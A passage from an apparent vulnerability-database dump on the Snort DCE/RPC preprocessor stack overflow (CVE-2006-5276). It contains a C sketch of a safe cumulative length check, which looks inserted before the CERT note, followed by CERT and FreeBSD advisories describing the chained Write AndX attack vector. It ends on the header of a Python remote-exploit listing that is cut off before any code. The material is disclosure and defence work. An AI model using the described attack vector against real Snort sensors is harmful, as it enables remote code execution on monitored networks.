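/* Correct policy: the running total across the whole chain must fit the buffer. */
int accepted_cumulative(const wx_t *w, int n, size_t bufsz)
{
    size_t total = 0;
    for (int i = 0; i < n; i++) { total += w[i].len; if (total > bufsz) return 0; }
    return 1;
}

/* Reassemble the chained data into buf under the cumulative check only.
 * Returns bytes copied, or -1 when the segment is malformed or would not fit. */
long reassemble_writeandx(const uint8_t *seg, size_t seg_len, uint8_t *buf, size_t bufsz)
{
    wx_t w[MAX_CHAIN];
    int n = parse_writeandx_chain(seg, seg_len, w, MAX_CHAIN);
    size_t total = 0;
    if (n < 0 || !accepted_cumulative(w, n, bufsz)) return -1;
    for (int i = 0; i < n; i++) { memcpy(buf + total, seg + w[i].off, w[i].len); total += w[i].len; }
    return (long)total;
}

int main(void)
{
    uint8_t seg[256], buf[REASM_BUF];
    wx_t w[MAX_CHAIN];
    size_t lens[2] = { 40, 40 };                         /* each fits alone, not together */
    size_t len = build_writeandx_chain(seg, sizeof seg, lens, 2);
    int n = parse_writeandx_chain(seg, len, w, MAX_CHAIN);
    printf("requests=%d per-request=%d cumulative=%d reassembled=%ld\n", n,
           accepted_per_request(w, n, REASM_BUF), accepted_cumulative(w, n, REASM_BUF),
           reassemble_writeandx(seg, len, buf, REASM_BUF));
    return 0;
}
```

The per-request policy is shown as a predicate rather than as a copy loop on purpose: running the flawed accounting against a real buffer would be the overflow itself. The only difference between the two policies is whether the length check is applied to the running total, which is the check a reassembler of chained commands needs regardless of how large any single request is; the forward-only AndXOffset test closes the separate problem of a chain that points back at itself.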
\n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to execute arbitrary code with the privilege level of the Snort preprocessor. In most cases this would allow an attacker to compromise the system running Snort. \n \n--- \n \n### Solution \n\n**Upgrade** \nSourcefire has released Snort [2.6.1.3](<http://www.snort.org/docs/release_notes/release_notes_2613.txt>) which is available from the Snort [download](<http://www.snort.org/dl/>) site. See Snort document [2007-02-19](<http://www.snort.org/docs/advisory-2007-02-19.html>) for more details. Sourcefire customers should see [Sourcefire Support Login](<https://support.sourcefire.com/>) for more details on updates. \n \n--- \n \n**Disable the preprocessor**\n\n \nDisable the DCE/RPC preprocessor (dcerpc) by removing the DCE/RPC preprocessor directives from the configuration file (often `/etc/snort.conf` or `user.conf`). Note that disabling this preprocessor may allow fragmented attacks to evade the Snort sensor. See Sourcefire Advisory [2007-02-19](<http://www.snort.org/docs/advisory-2007-02-19.html>) for more details. \n \n--- \n \n### Vendor Information\n\n196240\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. 
Click here to view vendors.**\n\n### Gentoo Linux __ Affected\n\nNotified: February 19, 2007 Updated: March 12, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to Linux Gentoo Security Advisory [glsa-200703-01](<http://security.gentoo.org/glsa/glsa-200703-01.xml>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23196240 Feedback>).\n\n### Nortel Networks, Inc. __ Affected\n\nNotified: February 19, 2007 Updated: February 21, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [http://www130.nortelnetworks.com/go/main.jsp?cscat=BLTNDETAIL&DocumentOID=540173](<http://www130.nortelnetworks.com/go/main.jsp?cscat=BLTNDETAIL&DocumentOID=540173>)\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23196240 Feedback>).\n\n### Snort __ Affected\n\nNotified: February 17, 2007 Updated: February 19, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to Snort document [2007-02-19](<http://www.snort.org/docs/advisory-2007-02-19.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23196240 Feedback>).\n\n### Sourcefire Affected\n\nNotified: February 17, 2007 Updated: February 19, 2007 \n\n### 
Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Apple Computer, Inc. Not Affected\n\nNotified: February 19, 2007 Updated: February 22, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Cisco Systems, Inc. Not Affected\n\nNotified: February 19, 2007 Updated: February 20, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### F5 Networks, Inc. Not Affected\n\nNotified: February 19, 2007 Updated: February 23, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Force10 Networks, Inc. Not Affected\n\nNotified: February 19, 2007 Updated: March 22, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Foundry Networks, Inc. 
Not Affected\n\nNotified: February 19, 2007 Updated: January 30, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Intel Corporation Not Affected\n\nNotified: February 19, 2007 Updated: February 20, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Internet Security Systems, Inc. Not Affected\n\nNotified: February 19, 2007 Updated: February 20, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Intoto __ Not Affected\n\nNotified: February 19, 2007 Updated: February 20, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nIntoto products are not vulnerable to the possible exploit documented in this vulnerability note, as they do not use Snort or Sourcefire Intrusion Sensor Software as a component.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Juniper Networks, Inc. 
__ Not Affected\n\nNotified: February 19, 2007 Updated: February 22, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nJuniper Networks products are not susceptible to this vulnerability.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NetBSD Not Affected\n\nNotified: February 19, 2007 Updated: February 20, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Openwall GNU/*/Linux __ Not Affected\n\nNotified: February 19, 2007 Updated: February 20, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nOpenwall GNU/*/Linux is not vulnerable. We do not package Snort.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Red Hat, Inc. __ Not Affected\n\nNotified: February 19, 2007 Updated: February 21, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nNot vulnerable. Snort is not shipped in any Red Hat product.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### 3com, Inc. 
Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### AT&T Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Alcatel Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Avaya, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Avici Systems, Inc. 
Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Borderware Technologies Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Charlotte's Web Networks Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Check Point Software Technologies Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Chiaro Networks, Inc. 
Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Clavister Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Computer Associates Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Conectiva Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Cray Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### D-Link Systems, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Data Connection, Ltd. 
Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### EMC, Inc. (formerly Data General Corporation) Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Engarde Secure Linux Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ericsson Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Extreme Networks Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fedora Project Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fortinet, Inc. 
Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### FreeBSD, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fujitsu Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Global Technology Associates Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hewlett-Packard Company Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hitachi Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hyperchip Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not 
received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation (zseries) Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM eServer Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IP Filter Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Immunix Communications, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ingrian Networks, Inc. 
Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Linksys (A division of Cisco Systems) Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Lucent Technologies Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Luminous Networks Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Mandriva, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Microsoft Corporation Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### MontaVista Software, Inc. 
Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Multinet (owned Process Software Corporation) Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Multitech, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NEC Corporation Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Network Appliance, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NextHop Technologies, Inc. 
Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Nokia Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Novell, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### OpenBSD Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### QNX, Software Systems, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Redback Networks, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Riverstone Networks, Inc. 
Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### SUSE Linux Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Secure Computing Network Security Division Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Secureworx, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Silicon Graphics, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Slackware Linux Inc. 
Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sony Corporation Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Stonesoft Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sun Microsystems, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Symantec, Inc. 
Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### The SCO Group Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Trustix Secure Linux Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Turbolinux Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ubuntu Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Unisys Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Watchguard Technologies, Inc. 
Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Wind River Systems, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### ZyXEL Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### eSoft, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### netfilter Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n\n### References \n\n * <http://www.snort.org/docs/advisory-2007-02-19.html>\n * <https://support.sourcefire.com/>\n * <http://iss.net/threats/257.html>\n * <http://www.snort.org/docs/snort_htmanuals/htmanual_261/node104.html>\n * 
<http://www.snort.org/docs/release_notes/release_notes_2613.txt>\n * <http://www.snort.org/dl/>\n * <http://secunia.com/advisories/24235/>\n * <http://secunia.com/advisories/24190/>\n * <http://secunia.com/advisories/24272/>\n * <http://www.securityfocus.com/bid/22616>\n\n### Acknowledgements\n\nThis vulnerability was reported and researched by Neel Mehta from IBM ISS X-Force.\n\nThis document was written by Chris Taschner and Art Manion.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-5276](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-5276>) \n---|--- \n**Severity Metric:** | 23.63 \n**Date Public:** | 2007-02-19 \n**Date First Published:** | 2007-02-19 \n**Date Last Updated:** | 2008-01-30 20:45 UTC \n**Document Revision:** | 44 \n", "modified": "2008-01-30T20:45:00", "published": "2007-02-19T00:00:00", "id": "VU:196240", "href": "https://www.kb.cert.org/vuls/id/196240", "type": "cert", "title": "Sourcefire Snort DCE/RPC preprocessor does not properly reassemble fragmented packets", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:37", "bulletinFamily": "unix", "cvelist": ["CVE-2006-5276"], "description": "\nAn IBM Internet Security Systems Protection Advisory reports:\n\nSnort is vulnerable to a stack-based buffer overflow as a result of DCE/RPC reassembly. This vulnerability is in a dynamic-preprocessor enabled in the default configuration, and the configuration for this preprocessor allows for auto-recognition of SMB traffic to perform reassembly on. No checks are performed to see if the traffic is part of a valid TCP session, and multiple Write AndX requests can be chained in the same TCP segment. 
As a result, an attacker can exploit this overflow with a single TCP PDU sent across a network monitored by Snort or Sourcefire.\nSnort users who cannot upgrade immediately are advised to disable the DCE/RPC preprocessor by removing the DCE/RPC preprocessor directives from snort.conf and restarting Snort. However, be advised that disabling the DCE/RPC preprocessor reduces detection capabilities for attacks in DCE/RPC traffic. After upgrading, customers should re-enable the DCE/RPC preprocessor.\n\n", "edition": 4, "modified": "2007-02-19T00:00:00", "published": "2007-02-19T00:00:00", "id": "AFDF500F-C1F6-11DB-95C5-000C6EC775D9", "href": "https://vuxml.freebsd.org/freebsd/afdf500f-c1f6-11db-95c5-000c6ec775d9.html", "title": "snort -- DCE/RPC preprocessor vulnerability", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-01-31T18:54:18", "description": "Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux). CVE-2006-5276. Remote exploit for linux platform", "published": "2007-03-30T00:00:00", "type": "exploitdb", "title": "Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit linux", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5276"], "modified": "2007-03-30T00:00:00", "id": "EDB-ID:3609", "href": "https://www.exploit-db.com/exploits/3609/", "sourceData": "#!/usr/bin/python\n#\n# Remote exploit for Snort DCE/RPC preprocessor vulnerability as described in\n# CVE-2006-5276. 
